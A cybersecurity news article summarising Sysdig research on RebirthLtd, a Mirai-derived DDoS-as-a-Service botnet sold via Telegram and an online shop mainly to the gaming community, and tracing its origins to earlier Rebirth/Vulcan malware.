DDoS-as-a-Service Botnet Backed by Mirai Attacking Gaming Community

DDoS-as-a-Service botnets are used by hackers to facilitate the most easily and cheaply launch of devastating distributed denial-of-service (DDoS) attacks.

Purposely, these botnets are made up of hacked devices that can be rented or leased to cause service disruptions or outages by flooding targets with high traffic volumes.

DDoS-as-a-Service is much easier for hackers looking for ways of extorting businesses, hurting others, and remaining anonymous.

Cybersecurity researchers at Sysdig Threat Research Team (TRT) recently discovered that DDoS-as-a-Service botnet is backed by Mirai attacking the gaming community.

DDoS-as-a-Service Botnet

The Sysdig Threat Research Team discovered that the “rebirthltd.com” domain was involved in a financially motivated and growing DDoS-as-a-Service botnet based on Mirai malware in March 2024. 

All-in-One Cybersecurity Platform for MSPs to provide full breach protection with a single tool, Watch a Full Demo 

This service, advertised via Telegram or an online shop, focuses mostly on the gaming community but also introduces risks for corporate entities. 

Mirai-derived botnet operators who are threat actors employ hacked devices to engage in massive distributed denial of service attacks targeting potential buyers, giving a glimpse into the changing world of cybercrime services that can stall business activities.

The Mirai malware sourced RebirthLtd for its botnet that delivers DDoS-as-a-Service and is marketed as a subscription service accessible through an online store and Telegram channel.

This is mainly focused on gamers who may have video game streamers or persons known as “trolls” who disrupt the whole gameplay process.

By operating under different hacking groups, some of whom are claimed to be part of this ring, including CazzG, supposedly a Chinese administrator, it represents one emerging illicit ecosystem that promotes the illegal sale of bots and DDoS tools using anonymity and simple access.

From where the RebirthLtd DDoS botnet came from can be traced to previous malware families and campaigns. Investigations show it to shop4youv2.de (Mirai was responsible for the FBI’s Operation PowerOFF) and Tsuki. army (advertising a second network of bots). 

Preliminary analysis from 2020 showed that “Rebirth” or “Vulcan” was an IoT-oriented botnet distinctively constructed on Gafgyt, QBot, and STDBot with known exploits. 

The fact that initial campaigns probably involved the developers of the botnet, since August 2022, people may have been drawn to the commercialized model of offering DDoS-as-a-service with a wider range of customers utilizing malicious capabilities by RebirthLtd. 

This change is proof that threat actors continuously repackage and sell malware strains.

An investigation of the RebirthLtd DDoS botnet revealed that it evolved from previous malware variants like Rebirth/Vulcan. The latter featured code similarities and common infrastructure connections such as to domains yosh[.]ltd and blkyosh[.]com.

Though the first campaigns in 2019-2020 must have largely involved its developers, multiple countries have recently been hit with massive attacks.

These payloads consist of malicious bash scripts trying to download and execute architecture-specific ELF files, sometimes by names of vulnerabilities or services.

The release of Mirai’s source code fueled a botnet industry and threats like Rebirth, reinforcing the need for diligent vulnerability management and runtime threat detection.

Get special offers from ANY.RUN Sandbox. Until May 31, get 6 months of free service or extra licenses. Sign up for free.